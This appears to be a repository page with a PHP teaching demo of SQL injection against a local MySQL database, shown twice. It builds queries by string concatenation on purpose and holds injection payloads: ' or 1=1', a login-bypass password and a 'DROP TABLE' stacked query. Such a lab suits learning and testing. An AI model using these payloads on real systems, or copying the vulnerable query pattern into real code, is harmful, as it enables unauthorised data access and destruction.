HenriqueCarvalho/SQL injection

## SQL injection
<html>
<head>
<title>MySQL Database</title>
</head>
<body>
<?php
$user = 'root';
$password = 'root';
$db = 'sql_injection';
$host = 'localhost';
$port = 8889;

// Create connection
$conn = new mysqli($host, $user, $password, $db);

// Check connection
/*if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
} else {
	echo "Connection is okay" . "<br>";
}*/
?>
<h1>SQL INJECTION</h1>
<h2>Database User</h2>
<?php
// SHOWING ALL THE RESULTS FROM DB USER
$sql = "SELECT id, name, email, password FROM USER";
$result = $conn->query($sql);

if ($result->num_rows > 0) {
    // output data of each row
    while($row = $result->fetch_assoc()) {
        echo "id: " . $row["id"] . " - name: " . $row["name"] . "  - email: " . $row["email"] . "<br>";
    }
} else {
    echo "0 results";
}
?>

<h2>Examples</h2>
<H3>Example One</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
$sql_injection = "SELECT * FROM User WHERE id = 1000";

// examples
$example_one = " or 1=1";

// tests -> only change the number of example
$sql_injection_test = $sql_injection . $example_one;
$result = $conn->query($sql_injection_test);
echo "SQL used: " . $sql_injection_test . "<br><br>";
echo "Input: " . $example_one . "<br><br>";

if ($result->num_rows > 0) {
	echo "The attack was successful!" . "<br><br>";
	echo "Answer: The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true!" . "<br><br>";
    // output data of each row
    while($row = $result->fetch_assoc()) {
        echo "id: " . $row["id"] . " - name: " . $row["name"] . "  - email: " . $row["email"] . "<br>";
    }
} else {
    echo "The attack was not successful!" . "<br><br>";
}
?>

<H3>Example Two</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
$sql_injection = "SELECT * FROM User WHERE email = 'bobo@email.com' and password = '1234'";

// examples
$example_two = " or 1=1";

// tests -> only change the number of example
$sql_injection_test = $sql_injection . $example_two;
$result = $conn->query($sql_injection_test);
echo "SQL used: " . $sql_injection_test . "<br><br>";
echo "Input: " . $example_two . "<br><br>";

if ($result->num_rows > 0) {
	echo "The attack was successful!" . "<br><br>";
	echo "Answer: The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true!" . "<br><br>";
    // output data of each row
    while($row = $result->fetch_assoc()) {
        echo "id: " . $row["id"] . " - name: " . $row["name"] . "  - email: " . $row["email"] . "<br>";
    }
} else {
    echo "The attack was not successful!" . "<br><br>";
}
?>

<H3>Example Three</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
// examples
$user = "1";
$password = "1' or '1'='1";

$sql_injection = "SELECT * FROM User WHERE email = '" . $user . "' and password = '" . $password . "'";

$result = $conn->query($sql_injection);

echo "SQL used: " . $sql_injection . "<br><br>";
echo "Input user: " . $user . "<br>";
echo "Input password: " . $password . "<br><br>";

if ($result->num_rows > 0) {
	echo "The attack was successful!" . "<br><br>";
	echo "Answer:";
    // output data of each row
    while($row = $result->fetch_assoc()) {
        echo "id: " . $row["id"] . " - name: " . $row["name"] . "  - email: " . $row["email"] . "<br>";
    }
} else {
    echo "The attack was not successful!" . "<br><br>";
}
?>

<H3>Example Four</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
// examples
$id = "1; DROP TABLE User1";
$sql_injection = "SELECT * FROM User WHERE id=" . $id;

$result = $conn->query($sql_injection);

echo "SQL used: " . $sql_injection . "<br><br>";
echo "Input id: " . $id . "<br>";
?>

<?php
// closing the connection
// phpinfo();
$conn->close();
?>
</body>
</html>
	<html>
	<head>
	<title>MySQL Database</title>
	</head>
	<body>
	<?php
	$user = 'root';
	$password = 'root';
	$db = 'sql_injection';
	$host = 'localhost';
	$port = 8889;

	// Create connection
	$conn = new mysqli($host, $user, $password, $db);

	// Check connection
	/*if ($conn->connect_error) {
	die("Connection failed: " . $conn->connect_error);
	} else {
	echo "Connection is okay" . "<br>";
	}*/
	?>
	<h1>SQL INJECTION</h1>
	<h2>Database User</h2>
	<?php
	// SHOWING ALL THE RESULTS FROM DB USER
	$sql = "SELECT id, name, email, password FROM USER";
	$result = $conn->query($sql);

	if ($result->num_rows > 0) {
	// output data of each row
	while($row = $result->fetch_assoc()) {
	echo "id: " . $row["id"] . " - name: " . $row["name"] . " - email: " . $row["email"] . "<br>";
	}
	} else {
	echo "0 results";
	}
	?>

	<h2>Examples</h2>
	<H3>Example One</H3>
	<?php
	// CODE BELOW IS ABOUT SQL INJECTION
	$sql_injection = "SELECT * FROM User WHERE id = 1000";

	// examples
	$example_one = " or 1=1";

	// tests -> only change the number of example
	$sql_injection_test = $sql_injection . $example_one;
	$result = $conn->query($sql_injection_test);
	echo "SQL used: " . $sql_injection_test . "<br><br>";
	echo "Input: " . $example_one . "<br><br>";

	if ($result->num_rows > 0) {
	echo "The attack was successful!" . "<br><br>";
	echo "Answer: The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true!" . "<br><br>";
	// output data of each row
	while($row = $result->fetch_assoc()) {
	echo "id: " . $row["id"] . " - name: " . $row["name"] . " - email: " . $row["email"] . "<br>";
	}
	} else {
	echo "The attack was not successful!" . "<br><br>";
	}
	?>

	<H3>Example Two</H3>
	<?php
	// CODE BELOW IS ABOUT SQL INJECTION
	$sql_injection = "SELECT * FROM User WHERE email = 'bobo@email.com' and password = '1234'";

	// examples
	$example_two = " or 1=1";

	// tests -> only change the number of example
	$sql_injection_test = $sql_injection . $example_two;
	$result = $conn->query($sql_injection_test);
	echo "SQL used: " . $sql_injection_test . "<br><br>";
	echo "Input: " . $example_two . "<br><br>";

	if ($result->num_rows > 0) {
	echo "The attack was successful!" . "<br><br>";
	echo "Answer: The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true!" . "<br><br>";
	// output data of each row
	while($row = $result->fetch_assoc()) {
	echo "id: " . $row["id"] . " - name: " . $row["name"] . " - email: " . $row["email"] . "<br>";
	}
	} else {
	echo "The attack was not successful!" . "<br><br>";
	}
	?>

	<H3>Example Three</H3>
	<?php
	// CODE BELOW IS ABOUT SQL INJECTION
	// examples
	$user = "1";
	$password = "1' or '1'='1";

	$sql_injection = "SELECT * FROM User WHERE email = '" . $user . "' and password = '" . $password . "'";

	$result = $conn->query($sql_injection);

	echo "SQL used: " . $sql_injection . "<br><br>";
	echo "Input user: " . $user . "<br>";
	echo "Input password: " . $password . "<br><br>";

	if ($result->num_rows > 0) {
	echo "The attack was successful!" . "<br><br>";
	echo "Answer:";
	// output data of each row
	while($row = $result->fetch_assoc()) {
	echo "id: " . $row["id"] . " - name: " . $row["name"] . " - email: " . $row["email"] . "<br>";
	}
	} else {
	echo "The attack was not successful!" . "<br><br>";
	}
	?>

	<H3>Example Four</H3>
	<?php
	// CODE BELOW IS ABOUT SQL INJECTION
	// examples
	$id = "1; DROP TABLE User1";
	$sql_injection = "SELECT * FROM User WHERE id=" . $id;

	$result = $conn->query($sql_injection);

	echo "SQL used: " . $sql_injection . "<br><br>";
	echo "Input id: " . $id . "<br>";
	?>

	<?php
	// closing the connection
	// phpinfo();
	$conn->close();
	?>
	</body>
	</html>